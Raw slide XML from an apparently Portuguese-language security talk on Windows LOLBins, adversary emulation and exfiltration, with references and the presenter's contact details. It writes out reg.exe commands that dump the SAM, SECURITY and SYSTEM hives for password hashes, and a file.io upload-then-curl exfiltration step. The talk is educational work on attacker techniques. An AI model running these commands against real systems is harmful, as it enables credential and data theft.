            <a:off x="7592334" y="6392554"/>
            <a:ext cx="383521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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CA9D40-4672-6E1C-A851-1B2EA8E985F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860326" y="1242970"/>
            <a:ext cx="988014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PsExec.exe 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(~7,2%) = Ferramenta remota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Sysinternals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executar processos em hosts.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Ataques: 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execução remota de comandos em hosts, movimento lateral e implantação de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payloads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pt-BR" b="1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7E0C1CC-81CB-BE44-2F3C-A849BDD62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429" y="1981592"/>
            <a:ext cx="8224422" cy="44109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40932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9F6821AB-B490-8216-62C8-C775C98C2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9B39240E-38AA-06BE-4445-71DFBF3CDE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="5382207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4FDE2C1D-52E6-15A3-A214-8CCACA72B3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-204016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3027E46B-F17B-FAC4-341E-7B776BA605E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-119304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219A2E68-A1E9-17BD-1DC6-EC3BE4721E7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260558"/>
            <a:ext cx="2513427" cy="63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C19081E9-6CBD-A516-2555-5F33DB7C77AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD443B2D-A4A4-44A3-848E-CD2835855825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956834" y="5578831"/>
            <a:ext cx="4172949" cy="30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 sz="9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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="9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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="9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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8968CDEC-85C0-4AB1-77F6-A0F2CF1CF37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="1600252"/>
            <a:ext cx="1038232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CertUtil.exe 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(~7,2%) = Utilitário de certificados Windows; também usado para manipulação/verificação.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Ataques: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download de arquivos via HTTP(S) e decodificação/base64 (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exfiltrar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/recuperar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payloads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 elevar furtividade.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" b="1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0CA7EA8-DC59-479E-51A3-1F8377F19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73" y="2517508"/>
            <a:ext cx="7330031" cy="1076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6FDCA16-F7D0-CA45-F073-F6D3CB597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53" y="4044094"/>
            <a:ext cx="9894988" cy="7386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15022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2A62EDFE-2F04-8FDF-EEE8-8E73EFC2E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A35577F7-5734-1B51-B6DE-F2AD849D193B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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E96CF032-3A07-D79D-900A-0ECD818C5B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-204016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55F5DB50-079C-EB28-6D0D-28171937542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-119304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C70789B8-0AC5-5AE6-D996-E40A114CBCE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260558"/>
            <a:ext cx="2513427" cy="63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2107EE68-06F8-C8FA-0C3B-BB05D41765BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0606C0C3-F781-E05C-4F50-FF67482F690D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846512" y="6435007"/>
            <a:ext cx="37803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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D589DC-3D99-C6DD-D226-0C5C41A58620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="1451719"/>
            <a:ext cx="9880142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Reg.exe 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(~7,2%) = Ferramenta de linha de comando para ler/modificar o Registro Windows.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Ataques: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persistência (chaves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RunOnce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 alteração de configuração de segurança, ocultação de evidências,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dump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hives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registro (SAM, SYSTEM, SECURITY) para recuperar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hashes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senha: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C:\&gt; reg.exe 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save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hklm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\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c:\temp\sam.save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C:\&gt; reg.exe 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save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hklm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\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c:\temp\security.save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C:\&gt; reg.exe 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save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hklm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\system c:\temp\system.save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C5CF0CB-071B-BECC-0398-3F87215E1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4842" y="3527165"/>
            <a:ext cx="7366715" cy="28115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93D07C1-4EF8-EA3A-0285-6692810DD080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2386584" y="3542868"/>
            <a:ext cx="7287768" cy="28115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1803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501C2CBE-393E-5461-1DE9-DFBD2B19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0B92478E-EDF9-2EDD-C652-35DF0F8ABF6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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CBCABFAE-090C-8C68-20CA-FE14DCA603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-204016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F019B265-9CE7-D79E-DACD-6902FD4E141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-119304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7A692765-0BA8-B160-4BBF-853FF773E07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260558"/>
            <a:ext cx="2513427" cy="63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9D28F623-359A-A6C7-11C8-B5677EEBBE30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F93A211A-76AC-B346-397A-6C5E58150444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800792" y="6425863"/>
            <a:ext cx="37803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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229DD439-C0D3-7DD9-AAB7-C72369D997B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="1387711"/>
            <a:ext cx="9880142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wscript.exe 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(~7,2%) = Host do Windows Script para executar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VBScript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/JScript.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Ataques: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execução de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VBScript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/JScript para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downloader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stagers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persistência e execução de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payloads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pt-B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13A8A2-31A2-598F-8A1F-3FF4773E45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31" y="2198640"/>
            <a:ext cx="7452325" cy="4199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3252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61C25E87-AC05-8641-7D30-23BFED263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8934015C-76BD-25F1-B59C-919B0FE92227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638174"/>
            <a:ext cx="10627500" cy="6146673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1CE2971E-B5FF-AE32-F2F8-7F42292BB86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-204016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45156219-ED02-A407-05EA-5B9378F894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-119304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D9EE0DCA-06A4-45FF-F40E-0E31BB7747B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260558"/>
            <a:ext cx="2513427" cy="63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1011371E-170B-1543-00EF-911DE166E462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D81BE8D-84CC-55FC-D216-9CC9B6D04410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7647198" y="6507888"/>
            <a:ext cx="37803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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C000C0-8EF3-EA6D-7E71-6C9C5047E60E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="1275551"/>
            <a:ext cx="9880142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rundll32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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pt-BR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(~5,1%)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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pt-BR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= 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Carrega e executa funções exportadas de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DLLs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Windows.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Ataques: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carregar e executar funções exportadas de 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DLLs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maliciosas (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loader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 evasão via uso de processo legítimo.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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FEFEF0-DE3A-DC5C-820C-AD1145C22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1512" y="1999885"/>
            <a:ext cx="5214163" cy="4724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20561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A1E8E843-2432-F0B5-F75C-BCCC22DE5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FEF496BE-F16B-DCC1-B1B1-82DCEBDCEBFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="886969"/>
            <a:ext cx="10627500" cy="4946904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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4133CC3-3169-75D3-CDBC-AB34683ABD8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55" y="-11992"/>
            <a:ext cx="2714117" cy="15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41423F78-84B4-2011-15DB-FF024B0C28A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427" y="72720"/>
            <a:ext cx="3758171" cy="14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Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E055E9-B484-559A-109D-0AB60410CAC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800" y="452582"/>
            <a:ext cx="2513427" cy="6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28A7A66C-9DD5-79EA-206E-CBFFD38352B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8643" y="188487"/>
            <a:ext cx="4249969" cy="709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DCBEBB20-AC1C-1E12-9494-4AE90349AB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874645" y="886968"/>
            <a:ext cx="777831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Exfiltração: Exfiltração via cloud (T1041)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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8686E8A-6D74-0362-F0B8-431995EB2BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="1895369"/>
            <a:ext cx="82421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r>
              <a:rPr lang="pt-BR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Enviar os arquivos da máquina alvo para os atacantes (normalmente via C2).</a:t>
            </a:r>
            <a:endParaRPr sz="1800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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B6E0D2-A82D-C0B2-0BEA-16215269A103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298662" y="2940093"/>
            <a:ext cx="8574385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Exfiltração via cloud web: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Máquina alvo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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Acessar o site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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https://www.file.io/ e subir os arquivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="18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Máquina Atacante:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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Lsk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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https://www.file.io/Tiakmnsa -o arquivo.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1619942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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6CF046D-79FB-1F71-9938-614280B66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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042084B6-9274-26E7-94CB-1F4981A5D257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992850" y="308025"/>
            <a:ext cx="8861700" cy="6217200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5" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91070ACD-0ADF-1AD7-38CF-B978F94E771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836" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6F5145-FC31-C969-BE2A-AF921AC8373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3519" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE57709-57D4-F1B3-2FD7-34D6A50228C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2968" y="1194537"/>
            <a:ext cx="3430462" cy="86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BA63396A-5E40-3B26-BD34-7115660E197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02968" y="2320534"/>
            <a:ext cx="3302636" cy="55154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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02846E19-3214-FC83-E44A-19CF07FAE0C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382876" y="1152444"/>
            <a:ext cx="6221288" cy="489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  <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>O que é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1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  <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>infostealer</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="16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9"/>
              </a:rPr>
              <a:t>Emulação de adversário</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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0"/>
              </a:rPr>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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1"/>
              </a:rPr>
              <a:t>Grupo Red Apollo</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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2"/>
              </a:rPr>
              <a:t>Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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2"/>
              </a:rPr>
              <a:t>APTs</a:t>
            </a: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2"/>
              </a:rPr>
              <a:t> 2024</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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3"/>
              </a:rPr>
              <a:t>APT Quarterly Highlights : Q1 – 2024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4"/>
              </a:rPr>
              <a:t>Cyber Threats Targeting Users and Enterprises in Brazil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5"/>
              </a:rPr>
              <a:t>Grupos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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5"/>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a: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5"/>
              </a:rPr>
              <a:t> Atacam 25 Empresas no Brasil</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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6"/>
              </a:rPr>
              <a:t>Exe</a:t>
            </a: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6"/>
              </a:rPr>
              <a:t> ADS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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6"/>
              </a:rPr>
              <a:t>Methods</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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7"/>
              </a:rPr>
              <a:t>Hacktricks</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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8"/>
              </a:rPr>
              <a:t>Red Team Notes</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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9"/>
              </a:rPr>
              <a:t>The Hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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9"/>
              </a:rPr>
              <a:t>Recipes</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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0"/>
              </a:rPr>
              <a:t>Offensive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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0"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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0"/>
              </a:rPr>
              <a:t>Cheatsheet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3BAC285E-CC1B-96CE-D6E9-5E45C5C9354A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7272759" y="383325"/>
            <a:ext cx="207881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BR" sz="2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Public Sans Black"/>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr sz="11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Public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2546604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9B2F2693-75A1-E20F-2C1F-64014477C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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF5AF1C7-C6AD-0494-304D-28A2FF5BD96A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91AEDEB7-FB9E-0045-462E-E3C1DCBE66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7996" y="5021943"/>
            <a:ext cx="2955897" cy="1531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43FEB389-3791-4E0A-E34F-46069409054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386" y="275772"/>
            <a:ext cx="3039959" cy="1574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 descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A1A18B-D72A-5A1A-A900-63C9F0A08C0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04629" y="1529298"/>
            <a:ext cx="6582741" cy="379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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47465EA-DD7D-97B3-5EC9-A8C78DB294C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8512" y="1673141"/>
            <a:ext cx="9114974" cy="359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64FB1036-CE18-772A-E9F6-A45BDAD5816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63494" y="1529298"/>
            <a:ext cx="3662266" cy="61160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7;p3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384D8EA4-86DC-C3DC-F474-BCF70EF3E9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225794" y="2687416"/>
            <a:ext cx="5740409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pt-BR" sz="9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lgerian" panose="04020705040A02060702" pitchFamily="82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Dúvidas?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2595003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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323682" y="1698703"/>
            <a:ext cx="7743757" cy="4425021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5" descr="For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90572" y="660309"/>
            <a:ext cx="4460723" cy="25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 descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorre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724889" y="660309"/>
            <a:ext cx="5129358" cy="202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 descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorre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560" y="1194537"/>
            <a:ext cx="3430462" cy="86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 descr="Imagem gráfica de pessoa em pé&#10;&#10;O conteúdo gerado por IA pode estar incorre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644104" y="2397260"/>
            <a:ext cx="3302636" cy="55154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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4301794" y="1683460"/>
            <a:ext cx="7787532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Quais são as motivações de um ataque?</a:t>
            </a:r>
            <a:endParaRPr sz="6000" b="1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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279294" y="2641600"/>
            <a:ext cx="5505208" cy="3965636"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3294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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530235" y="3633123"/>
            <a:ext cx="5003325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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Hacker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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="6600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Hackeia</a:t>
            </a:r>
            <a:endParaRPr sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Biome Light" panose="020B0502040204020203" pitchFamily="34" charset="0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576485" y="2783439"/>
            <a:ext cx="500332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0" i="0" u="none" strike="noStrike" cap="none" dirty="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Obrigado a todos!</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0"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172" name="Google Shape;172;p9" descr="Gradiente de cor pastel celes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0494" y="0"/>
            <a:ext cx="613194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9" descr="Forma&#10;&#10;O conteúdo gerado por IA pode estar incorre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5454" y="432038"/>
            <a:ext cx="3244328" cy="18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9" descr="Forma, Retângulo&#10;&#10;O conteúdo gerado por IA pode estar incorre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1445" y="524854"/>
            <a:ext cx="4492344" cy="177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9" descr="Logotipo&#10;&#10;O conteúdo gerado por IA pode estar incorre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55402" y="987368"/>
            <a:ext cx="3004432" cy="7618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6;p25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861AC270-A8FF-26EC-C89D-CBE7D4078E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651207" y="1261727"/>
            <a:ext cx="49581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 Black"/>
              </a:rPr>
              <a:t>Lucas Farias Piasentin</a:t>
            </a:r>
            <a:endParaRPr sz="3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ublic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u="sng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lfpiasentin@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" u="sng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"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr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"/>
              </a:rPr>
              <a:t>(11)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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"/>
              </a:rPr>
              <a:t> 9.4963.9255</a:t>
            </a:r>
            <a:endParaRPr sz="24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ublic Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;168;p25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D28B9EF5-3383-7456-EB10-92B715D9BB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7187324" y="2691211"/>
